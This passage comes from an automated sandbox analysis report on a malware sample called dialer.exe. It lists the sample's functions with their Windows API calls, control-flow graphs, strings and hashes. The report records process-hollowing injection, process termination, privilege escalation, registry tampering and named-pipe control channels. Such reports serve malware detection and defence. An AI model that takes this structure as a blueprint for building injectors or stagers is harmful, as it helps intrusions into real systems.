                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                        • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                        • API String ID: 2561231171-3753927220
                        • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                        • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                        • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                        • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                        Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                        • String ID:
                        • API String ID: 4084875642-0
                        • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                        • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                        • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                        • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                        Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                        • String ID:
                        • API String ID: 3197395349-0
                        • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                        • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                        • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                        • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                        Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                        • String ID: .text$C:\Windows\System32\
                        • API String ID: 2721474350-832442975
                        • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                        • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                        • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                        • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                        Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                        • String ID: M$\\.\pipe\dialerchildproc64
                        • API String ID: 2203880229-3489460547
                        • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                        • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                        • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                        • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                        Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                        • String ID: \\.\pipe\dialercontrol_redirect64
                        • API String ID: 2071455217-3440882674
                        • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                        • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                        • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                        • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                        Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 SleepEx 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                        APIs
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                        • String ID:
                        • API String ID: 3676546796-0
                        • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                        • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                        • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                        • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                        Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                        • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                          • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                          • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                          • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                          • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                          • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                        • OpenProcess.KERNEL32 ref: 0000000140001859
                        • TerminateProcess.KERNELBASE ref: 000000014000186C
                        • CloseHandle.KERNEL32 ref: 0000000140001875
                        • GetProcessHeap.KERNEL32 ref: 0000000140001885
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                        • String ID:
                        • API String ID: 1323846700-0
                        • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                        • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                        • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                        • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                        Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                        APIs
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$CloseHandleOpenWow64
                        • String ID:
                        • API String ID: 10462204-0
                        • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                        • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                        • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                        • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                        Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                        APIs
                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                          • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                          • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                          • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                          • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                          • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                          • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                          • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                          • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                          • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                          • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                          • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                          • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                          • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                          • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                        • ExitProcess.KERNEL32 ref: 0000000140002263
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                        • String ID:
                        • API String ID: 3836936051-0
                        • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                        • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                        • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                        • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                        Non-executed Functions

                        Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                        • String ID: SOFTWARE$dialerstager$open
                        • API String ID: 3276259517-3931493855
                        • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                        • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                        • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                        • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                        Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 287 140001e8c-140001e91 286->287 288 140001cce-140001d25 CreateProcessW 286->288 287->286 291 140001e97 287->291 289 140001e88 288->289 290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 296 140001e85 292->296 293->292 297 140001d81-140001d87 293->297 295->289 298 140001e78-140001e83 TerminateProcess 295->298 296->289 299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 299->292 301 140001df1-140001e07 GetThreadContext 299->301 302 140001d8c-140001dba WriteProcessMemory 300->302 301->292 304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 303 140001dc0-140001dcc 302->303 303->302 305 140001dce 303->305 304->292 306 140001e30-140001e4c SetThreadContext 304->306 305->299 306->292 307 140001e4e-140001e5b ResumeThread 306->307 307->292 308 140001eba-140001ebf 307->308 308->294
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                        • String ID: @
                        • API String ID: 3462610200-2766056989
                        • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                        • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                        • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                        • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                        Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                        • String ID: dialersvc64
                        • API String ID: 4184240511-3881820561
                        • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                        • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                        • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                        • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                        Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Delete$CloseEnumOpen
                        • String ID: SOFTWARE\dialerconfig
                        • API String ID: 3013565938-461861421
                        • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                        • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                        • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                        • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                        Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: File$Write$CloseCreateHandle
                        • String ID: \\.\pipe\dialercontrol_redirect64
                        • API String ID: 148219782-3440882674
                        • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                        • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                        • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                        • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                        Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
